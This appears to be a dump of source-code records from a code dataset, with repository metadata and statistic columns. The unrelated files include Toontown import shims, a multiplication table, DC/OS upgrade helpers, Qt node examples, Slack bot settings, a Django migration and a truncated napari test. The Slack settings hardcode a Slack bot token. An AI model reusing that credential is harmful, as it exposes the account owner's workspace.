|
2021-02-13T22:40:50.000Z
|
dev/tools/leveleditor/pandac/PandaModules.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
dev/tools/leveleditor/pandac/PandaModules.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
# NOTE(review): Python 2 syntax ("except ImportError, err") -- this module
# cannot be imported under Python 3.
# Each block below pulls the names of one native Panda3D / OTP / Toontown
# extension module into this namespace.  An ImportError whose message
# contains 'DLL loader cannot find' means the optional library simply is
# not present and is silently tolerated; any other ImportError is a real
# failure and is re-raised.
try:
    from libpandaexpressModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
try:
    from libpandaModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
try:
    from libpandaphysicsModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
try:
    from libdirectModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
try:
    from libpandafxModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
try:
    from libpandaodeModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
try:
    from libotpModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
try:
    from libtoontownModules import *
except ImportError, err:
    if 'DLL loader cannot find' not in str(err):
        raise
| 21.75
| 48
| 0.671456
| 136
| 1,044
| 5.154412
| 0.169118
| 0.079886
| 0.262482
| 0.296719
| 0.788873
| 0.788873
| 0.788873
| 0.788873
| 0.788873
| 0.788873
| 0
| 0
| 0.259579
| 1,044
| 47
| 49
| 22.212766
| 0.906856
| 0
| 0
| 0.8
| 0
| 0
| 0.168582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.4
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
16f3b9243726b77a85a24462c0c49b0a4eb40ead
| 796
|
py
|
Python
|
lesson01/luofeng/99_table.py
|
herrywen-nanj/51reboot
|
1130c79a360e1b548a6eaad176eb60f8bed22f40
|
[
"Apache-2.0"
] | null | null | null |
lesson01/luofeng/99_table.py
|
herrywen-nanj/51reboot
|
1130c79a360e1b548a6eaad176eb60f8bed22f40
|
[
"Apache-2.0"
] | null | null | null |
lesson01/luofeng/99_table.py
|
herrywen-nanj/51reboot
|
1130c79a360e1b548a6eaad176eb60f8bed22f40
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- encoding:utf8 -*-
#*******************************************
# Author: LuoFeng
# Date: 2019-05-18
# Filename: 99_table.py
# Describe:
#*******************************************
# Print the 9x9 multiplication table three times: as a full square, as an
# upper-left triangle (columns from the row number up), and as a lower-left
# triangle (columns up to the row number).  Only the inner column range
# differs per layout, so iterate over the three range factories.
# NOTE: print()'s 'end' keyword needs Python 3 (python2 does not support it;
# the default is end='\n').
for columns_for in (lambda n: range(1, 10),      # square
                    lambda n: range(n, 10),      # upper-left triangle
                    lambda n: range(1, n + 1)):  # lower-left triangle
    for n in range(1, 10):
        for m in columns_for(n):
            print('{} * {} = {}'.format(n, m, n*m), end='\t')
        print('')
| 26.533333
| 61
| 0.472362
| 114
| 796
| 3.289474
| 0.324561
| 0.112
| 0.106667
| 0.106667
| 0.712
| 0.712
| 0.712
| 0.712
| 0.712
| 0.648
| 0
| 0.052885
| 0.21608
| 796
| 29
| 62
| 27.448276
| 0.548077
| 0.492462
| 0
| 0.75
| 0
| 0
| 0.107692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
e508f5357db4a49c22092c74450b60b28e97ffeb
| 3,726
|
py
|
Python
|
src/dcos_e2e_cli/common/upgrade.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 63
|
2018-05-17T21:02:14.000Z
|
2021-11-15T19:18:03.000Z
|
src/dcos_e2e_cli/common/upgrade.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 225
|
2017-09-08T02:24:58.000Z
|
2018-05-16T12:18:58.000Z
|
src/dcos_e2e_cli/common/upgrade.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 21
|
2018-06-14T21:58:24.000Z
|
2021-11-15T19:18:06.000Z
|
"""
Helpers for upgrading DC/OS on a cluster.
"""
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Iterable, Tuple
import click
from halo import Halo
from dcos_e2e.cluster import Cluster
from dcos_e2e.node import Output
from .base_classes import ClusterRepresentation
from .error_handling import show_calledprocess_error
def cluster_upgrade_dcos_from_path(
    cluster: Cluster,
    cluster_representation: ClusterRepresentation,
    ip_detect_path: Path,
    dcos_config: Dict[str, Any],
    files_to_copy_to_genconf_dir: Iterable[Tuple[Path, Path]],
    dcos_installer: Path,
    doctor_message: str,
    enable_spinner: bool,
) -> None:
    """
    Upgrade DC/OS on a cluster from a local installer file.

    Args:
        cluster: The cluster to upgrade DC/OS on.
        cluster_representation: A representation of the cluster.
        ip_detect_path: The ``ip-detect`` script to use for installing DC/OS.
        dcos_config: The DC/OS configuration to use.
        files_to_copy_to_genconf_dir: Pairs of host paths to paths on the
            installer node.  These are files to copy from the host to the
            installer node before upgrading DC/OS.
        dcos_installer: The ``Path`` to a local DC/OS installer.
        doctor_message: A message which instructs the user on which command
            to use if installation fails.
        enable_spinner: Whether to enable the spinner animation.
    """
    progress = Halo(enabled=enable_spinner)
    progress.start('Upgrading DC/OS')
    try:
        cluster.upgrade_dcos_from_path(
            dcos_installer=dcos_installer,
            dcos_config=dcos_config,
            ip_detect_path=ip_detect_path,
            files_to_copy_to_genconf_dir=files_to_copy_to_genconf_dir,
            output=Output.LOG_AND_CAPTURE,
        )
    except subprocess.CalledProcessError as exc:
        # Surface the installer failure, point the user at the doctor
        # command, then tear the cluster down and exit with the same code.
        progress.stop()
        show_calledprocess_error(exc=exc)
        click.echo(doctor_message)
        cluster_representation.destroy()
        sys.exit(exc.returncode)
    progress.succeed()
def cluster_upgrade_dcos_from_url(
    cluster: Cluster,
    cluster_representation: ClusterRepresentation,
    ip_detect_path: Path,
    dcos_config: Dict[str, Any],
    files_to_copy_to_genconf_dir: Iterable[Tuple[Path, Path]],
    dcos_installer: str,
    doctor_message: str,
    enable_spinner: bool,
) -> None:
    """
    Upgrade DC/OS on a cluster from an installer URL.

    Args:
        cluster: The cluster to upgrade DC/OS on.
        cluster_representation: A representation of the cluster.
        ip_detect_path: The ``ip-detect`` script to use for installing DC/OS.
        dcos_config: The DC/OS configuration to use.
        files_to_copy_to_genconf_dir: Pairs of host paths to paths on the
            installer node.  These are files to copy from the host to the
            installer node before upgrading DC/OS.
        dcos_installer: A URL pointing to an installer.
        doctor_message: A message which instructs the user on which command
            to use if installation fails.
        enable_spinner: Whether to enable the spinner animation.
    """
    progress = Halo(enabled=enable_spinner)
    progress.start('Upgrading DC/OS')
    try:
        cluster.upgrade_dcos_from_url(
            dcos_installer=dcos_installer,
            dcos_config=dcos_config,
            ip_detect_path=ip_detect_path,
            files_to_copy_to_genconf_dir=files_to_copy_to_genconf_dir,
            output=Output.LOG_AND_CAPTURE,
        )
    except subprocess.CalledProcessError as exc:
        # Surface the installer failure, point the user at the doctor
        # command, then tear the cluster down and exit with the same code.
        progress.stop()
        show_calledprocess_error(exc=exc)
        click.echo(doctor_message)
        cluster_representation.destroy()
        sys.exit(exc.returncode)
    progress.succeed()
| 33.267857
| 78
| 0.694042
| 490
| 3,726
| 5.036735
| 0.189796
| 0.02269
| 0.044571
| 0.042139
| 0.86953
| 0.843598
| 0.843598
| 0.843598
| 0.843598
| 0.843598
| 0
| 0.000708
| 0.241546
| 3,726
| 111
| 79
| 33.567568
| 0.872611
| 0.371981
| 0
| 0.71875
| 0
| 0
| 0.013599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.15625
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5472bc3d527750bfb50c5e56c38d936fceee316
| 1,970
|
py
|
Python
|
examples/simple/testnode.py
|
DrLuke/effigy
|
c970d945fc22787bd6b95ec2f1dfd317876ef4dc
|
[
"MIT"
] | null | null | null |
examples/simple/testnode.py
|
DrLuke/effigy
|
c970d945fc22787bd6b95ec2f1dfd317876ef4dc
|
[
"MIT"
] | null | null | null |
examples/simple/testnode.py
|
DrLuke/effigy
|
c970d945fc22787bd6b95ec2f1dfd317876ef4dc
|
[
"MIT"
] | null | null | null |
from effigy import QNodeSceneNode, NodeIO, NodeInput, NodeOutput
from PyQt5.QtWidgets import QGraphicsRectItem
from PyQt5.QtCore import QRectF, QPointF, Qt
from PyQt5.QtGui import QPen, QColor, QBrush
class TestNode(QNodeSceneNode):
    """Example scene node with one str output pin and one str input pin."""

    author = "Luke"
    modulename = "testmod"
    name = "Example Node"

    def addIO(self):
        """Create the output and input pins and register them in self.IO."""
        out_pin = NodeOutput(str, parent=self, name="output")
        out_pin.setPos(20, 10)
        self.IO["output"] = out_pin

        in_pin = NodeInput(str, parent=self, name="input")
        in_pin.setPos(-20, 10)
        self.IO["input"] = in_pin

    def boundingRect(self):
        """Delegate the bounding box to the main rectangle item."""
        return self.mainRect.rect()

    def addGraphicsItems(self):
        """Build the 30x30 rectangle used as the node body."""
        self.mainRect = QGraphicsRectItem(QRectF(-15, -15, 30, 30), self)

    def selectedChanged(self, state):
        """Outline the node in red while selected, black otherwise."""
        pen_color = Qt.red if state else Qt.black
        self.mainRect.setPen(QPen(pen_color))

    def serialize(self):
        """Persist this node's id under the 'testdata' key."""
        return {"testdata": self.id}

    def deserialize(self, data):
        """Restore from serialized data (just echoes it here)."""
        print("This node has data: %s" % data["testdata"])
class TestNode2(QNodeSceneNode):
    """Example scene node with an int output and an int-or-str input pin."""

    author = "Luke"
    modulename = "testmod"
    name = "Example Node"

    def addIO(self):
        """Create the output and input pins and register them in self.IO."""
        out_pin = NodeOutput(int, parent=self, name="output")
        out_pin.setPos(20, 10)
        self.IO["output"] = out_pin

        in_pin = NodeInput([int, str], parent=self, name="input")
        in_pin.setPos(-25, 10)
        self.IO["input"] = in_pin

    def boundingRect(self):
        """Delegate the bounding box to the main rectangle item."""
        return self.mainRect.rect()

    def addGraphicsItems(self):
        """Build the 30x30 rectangle used as the node body."""
        self.mainRect = QGraphicsRectItem(QRectF(-15, -15, 30, 30), self)

    def selectedChanged(self, state):
        """Outline the node in red while selected, black otherwise."""
        pen_color = Qt.red if state else Qt.black
        self.mainRect.setPen(QPen(pen_color))

    def serialize(self):
        """Persist this node's id under the 'testdata' key."""
        return {"testdata": self.id}

    def deserialize(self, data):
        """Restore from serialized data (just echoes it here)."""
        print("This node has data: %s" % data["testdata"])
| 28.142857
| 73
| 0.62132
| 227
| 1,970
| 5.39207
| 0.286344
| 0.078431
| 0.045752
| 0.071895
| 0.831699
| 0.831699
| 0.830065
| 0.772876
| 0.772876
| 0.772876
| 0
| 0.024374
| 0.250254
| 1,970
| 70
| 74
| 28.142857
| 0.804333
| 0
| 0
| 0.769231
| 0
| 0
| 0.084221
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.076923
| 0.076923
| 0.538462
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
e57397ac8823d3b4a2d993a40f35759fd877b2cb
| 160
|
py
|
Python
|
test/login.py
|
cz495969281/test007
|
43001233e7b61ee281c299cd66dedbd08eb667d8
|
[
"MIT"
] | null | null | null |
test/login.py
|
cz495969281/test007
|
43001233e7b61ee281c299cd66dedbd08eb667d8
|
[
"MIT"
] | null | null | null |
test/login.py
|
cz495969281/test007
|
43001233e7b61ee281c299cd66dedbd08eb667d8
|
[
"MIT"
] | null | null | null |
# Print a five-line divider banner, then define two sample numbers.
# The divider string is kept in one constant instead of five copy-pasted
# print statements; output is byte-identical to the original.
DIVIDER = "------------------"
for _ in range(5):
    print(DIVIDER)

num1 = 10  # sample operand (no further use visible in this file)
num2 = 20  # sample operand (no further use visible in this file)
| 20
| 27
| 0.23125
| 9
| 160
| 4.111111
| 0.555556
| 1.081081
| 1.216216
| 1.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040268
| 0.06875
| 160
| 7
| 28
| 22.857143
| 0.208054
| 0
| 0
| 0.714286
| 0
| 0
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.714286
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e5b5072f92e155561bc18cfadcbcd310c9fd1b61
| 262
|
py
|
Python
|
slack/python/slack_aiml_test/settings.py
|
m4573rn3rd/scripts
|
df29a79b5ed6a996ccf0357e4fe495dd05377848
|
[
"MIT"
] | null | null | null |
slack/python/slack_aiml_test/settings.py
|
m4573rn3rd/scripts
|
df29a79b5ed6a996ccf0357e4fe495dd05377848
|
[
"MIT"
] | null | null | null |
slack/python/slack_aiml_test/settings.py
|
m4573rn3rd/scripts
|
df29a79b5ed6a996ccf0357e4fe495dd05377848
|
[
"MIT"
] | null | null | null |
# Slackbot API Information
#
# SECURITY: these credentials were previously hard-coded in source control.
# They can now be supplied via environment variables; the original literals
# remain only as a backward-compatible fallback and should be rotated,
# since any token committed to a repository must be considered leaked.
import os

slack_bot_token = os.environ.get(
    "SLACK_BOT_TOKEN",
    "xoxb-2650828670406-2670419769553-qxTzP6Sbh9tlqfYIA52wh1bZ",
)
bot_id = os.environ.get(
    "SLACK_BOT_ID",
    "xoxb-2650828670406-2670419769553-qxTzP6Sbh9tlqfYIA52wh1bZ",
)

# AIML Files
directory = "/aiml"             # directory holding the AIML rule files
learn_file = "std-startup.xml"  # bootstrap file loaded first by the kernel
respond = "load aiml b"         # command that triggers loading the rules
| 32.75
| 77
| 0.80916
| 29
| 262
| 7.172414
| 0.758621
| 0.163462
| 0.288462
| 0.519231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.260504
| 0.091603
| 262
| 8
| 78
| 32.75
| 0.613445
| 0.133588
| 0
| 0
| 0
| 0
| 0.644444
| 0.506667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b72a057874a519f9464ed9ed2e2bbd59ff53aa
| 211
|
py
|
Python
|
src/events/game_start.py
|
ArcosJuan/Get-out-of-my-fucking-maze
|
ca2cfeaaeecb6c6f583ad647d020f25176170805
|
[
"MIT"
] | 1
|
2022-03-12T21:38:46.000Z
|
2022-03-12T21:38:46.000Z
|
src/events/game_start.py
|
ArcosJuan/Get-out-of-my-fucking-maze
|
ca2cfeaaeecb6c6f583ad647d020f25176170805
|
[
"MIT"
] | null | null | null |
src/events/game_start.py
|
ArcosJuan/Get-out-of-my-fucking-maze
|
ca2cfeaaeecb6c6f583ad647d020f25176170805
|
[
"MIT"
] | null | null | null |
from src.events import Event
class GameStart(Event):
    """Event fired when a game begins; carries the minimum board size."""

    def __init__(self, min_size):
        """Store the minimum size after initializing the base Event."""
        super().__init__()
        self.min_size = min_size

    def get_min_size(self):
        """Return the minimum size supplied at construction."""
        return self.min_size
| 21.1
| 48
| 0.64455
| 29
| 211
| 4.206897
| 0.517241
| 0.286885
| 0.270492
| 0.245902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265403
| 211
| 10
| 48
| 21.1
| 0.787097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e5ebc4932df04eab5f87fbd870f222dde7998412
| 15
|
py
|
Python
|
app/containers/Codedash/js/data/generator/temp.py
|
GAUTAMRAJU15/demo
|
fd11b6db098d5b0dec4de74590ff5239dd614a7e
|
[
"MIT"
] | null | null | null |
app/containers/Codedash/js/data/generator/temp.py
|
GAUTAMRAJU15/demo
|
fd11b6db098d5b0dec4de74590ff5239dd614a7e
|
[
"MIT"
] | 4
|
2020-04-05T22:02:22.000Z
|
2022-03-24T07:58:59.000Z
|
app/containers/Codedash/js/data/generator/temp.py
|
GAUTAMRAJU15/demo
|
fd11b6db098d5b0dec4de74590ff5239dd614a7e
|
[
"MIT"
] | null | null | null |
# Prints 8 % 6 - 5 / 3: modulo and true division bind tighter than
# subtraction, so this is (8 % 6) - (5 / 3) = 2 - 1.666..., a float
# close to 1/3.
print(8%6-5/3)
| 7.5
| 14
| 0.6
| 5
| 15
| 1.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 0.066667
| 15
| 1
| 15
| 15
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
f919e1e1800f004de4f9772da02f5180f9091681
| 9,460
|
py
|
Python
|
src/pages/migrations/0002_auto_20191214_1316.py
|
ahsanali2000/Patientio
|
254896ba0386a3738b5fd13800e1d524a5c47bea
|
[
"BSD-3-Clause"
] | 2
|
2020-04-19T20:13:46.000Z
|
2022-03-11T09:48:53.000Z
|
src/pages/migrations/0002_auto_20191214_1316.py
|
ahsanali2000/Patientio
|
254896ba0386a3738b5fd13800e1d524a5c47bea
|
[
"BSD-3-Clause"
] | 1
|
2020-06-26T22:26:22.000Z
|
2020-06-26T22:28:25.000Z
|
src/pages/migrations/0002_auto_20191214_1316.py
|
ahsanali2000/Patientio
|
254896ba0386a3738b5fd13800e1d524a5c47bea
|
[
"BSD-3-Clause"
] | 3
|
2020-06-21T20:52:12.000Z
|
2021-07-31T11:07:21.000Z
|
# Generated by Django 3.0 on 2019-12-14 08:16
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 3.0).

    Drops the intermediate Person/Patient models and denormalizes their
    profile columns (name, contact info, image, ...) directly onto each
    role model (doctor, history, labdoc, nurse, receptionist), and links
    several models straight to the configured auth user model.
    Generated file: do not hand-edit field definitions.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('pages', '0001_initial'),
    ]
    operations = [
        # Detach role models from the soon-to-be-deleted Person/Patient.
        migrations.RemoveField(
            model_name='doctor',
            name='person',
        ),
        migrations.RemoveField(
            model_name='history',
            name='patient',
        ),
        migrations.RemoveField(
            model_name='labdoc',
            name='person',
        ),
        migrations.RemoveField(
            model_name='nurse',
            name='person',
        ),
        migrations.RemoveField(
            model_name='receptionist',
            name='person',
        ),
        migrations.RemoveField(
            model_name='report',
            name='patient',
        ),
        # Appointment gains a free-text disease choice and a direct user FK.
        migrations.AddField(
            model_name='appointment',
            name='disease_option',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        migrations.AddField(
            model_name='appointment',
            name='user',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        # Flattened profile columns for each role model below; the same
        # field set repeats for doctor, history, labdoc, nurse and
        # receptionist (history additionally gets a user FK).
        migrations.AddField(
            model_name='doctor',
            name='address',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='doctor',
            name='age',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='doctor',
            name='email',
            field=models.EmailField(blank=True, max_length=254, null=True),
        ),
        migrations.AddField(
            model_name='doctor',
            name='first_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='doctor',
            name='image',
            field=models.FileField(default='', upload_to='images/'),
        ),
        migrations.AddField(
            model_name='doctor',
            name='last_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='doctor',
            name='phone',
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='doctor',
            name='sex',
            field=models.CharField(blank=True, max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='address',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='age',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='email',
            field=models.EmailField(blank=True, max_length=254, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='first_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='image',
            field=models.FileField(default='', upload_to='images/'),
        ),
        migrations.AddField(
            model_name='history',
            name='last_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='phone',
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='sex',
            field=models.CharField(blank=True, max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='history',
            name='user',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='address',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='age',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='email',
            field=models.EmailField(blank=True, max_length=254, null=True),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='first_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='image',
            field=models.FileField(default='', upload_to='images/'),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='last_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='phone',
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='labdoc',
            name='sex',
            field=models.CharField(blank=True, max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='nurse',
            name='address',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='nurse',
            name='age',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='nurse',
            name='email',
            field=models.EmailField(blank=True, max_length=254, null=True),
        ),
        migrations.AddField(
            model_name='nurse',
            name='first_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='nurse',
            name='image',
            field=models.FileField(default='', upload_to='images/'),
        ),
        migrations.AddField(
            model_name='nurse',
            name='last_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='nurse',
            name='phone',
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='nurse',
            name='sex',
            field=models.CharField(blank=True, max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='address',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='age',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='email',
            field=models.EmailField(blank=True, max_length=254, null=True),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='first_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='image',
            field=models.FileField(default='', upload_to='images/'),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='last_name',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='phone',
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='receptionist',
            name='sex',
            field=models.CharField(blank=True, max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='report',
            name='user',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        # Existing columns reshaped to match the new schema.
        migrations.AlterField(
            model_name='appointment',
            name='doctor',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='service',
            name='icon',
            field=models.FileField(default='', upload_to='images/'),
        ),
        migrations.AlterField(
            model_name='service',
            name='image',
            field=models.FileField(default='', upload_to='images/'),
        ),
        # The intermediate models are no longer referenced and are removed.
        migrations.DeleteModel(
            name='Patient',
        ),
        migrations.DeleteModel(
            name='Person',
        ),
    ]
| 33.546099
| 133
| 0.540803
| 891
| 9,460
| 5.612795
| 0.089787
| 0.095381
| 0.20236
| 0.237552
| 0.902819
| 0.902819
| 0.832434
| 0.824835
| 0.772446
| 0.772446
| 0
| 0.015868
| 0.333827
| 9,460
| 281
| 134
| 33.66548
| 0.77769
| 0.004545
| 0
| 0.941818
| 1
| 0
| 0.083165
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010909
| 0
| 0.021818
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0088f28f1c6652002fa08ccee3e16f6c267e08ec
| 2,424
|
py
|
Python
|
napari/components/_tests/test_world_coordinates.py
|
mrocklin/napari
|
b61d9ae570e30091a97b6c76e37cd95fe5b296b6
|
[
"BSD-3-Clause"
] | 1
|
2021-04-04T21:25:04.000Z
|
2021-04-04T21:25:04.000Z
|
napari/components/_tests/test_world_coordinates.py
|
mrocklin/napari
|
b61d9ae570e30091a97b6c76e37cd95fe5b296b6
|
[
"BSD-3-Clause"
] | 1
|
2020-10-15T19:31:09.000Z
|
2020-10-15T19:39:33.000Z
|
napari/components/_tests/test_world_coordinates.py
|
mrocklin/napari
|
b61d9ae570e30091a97b6c76e37cd95fe5b296b6
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from napari.components import ViewerModel
def test_translated_images():
    """Test two translated images."""
    viewer = ViewerModel()
    np.random.seed(0)
    volume = np.random.random((10, 10, 10))
    viewer.add_image(volume)
    viewer.add_image(volume, translate=[10, 0, 0])
    # Axis 0 spans both images; axes 1 and 2 are untouched.
    expected_ranges = [(0, 19, 1), (0, 9, 1), (0, 9, 1)]
    for axis, expected in enumerate(expected_ranges):
        assert viewer.dims.range[axis] == expected
    assert viewer.dims.nsteps == [20, 10, 10]
    # Every step along the combined axis must be reachable and sticky.
    for step in range(viewer.dims.nsteps[0]):
        viewer.dims.set_current_step(0, step)
        assert viewer.dims.current_step[0] == step
def test_scaled_images():
    """Test two scaled images."""
    viewer = ViewerModel()
    np.random.seed(0)
    volume = np.random.random((10, 10, 10))
    viewer.add_image(volume)
    # Half-resolution copy scaled x2 along axis 0 covers the same extent.
    viewer.add_image(volume[::2], scale=[2, 1, 1])
    expected_ranges = [(0, 9, 1), (0, 9, 1), (0, 9, 1)]
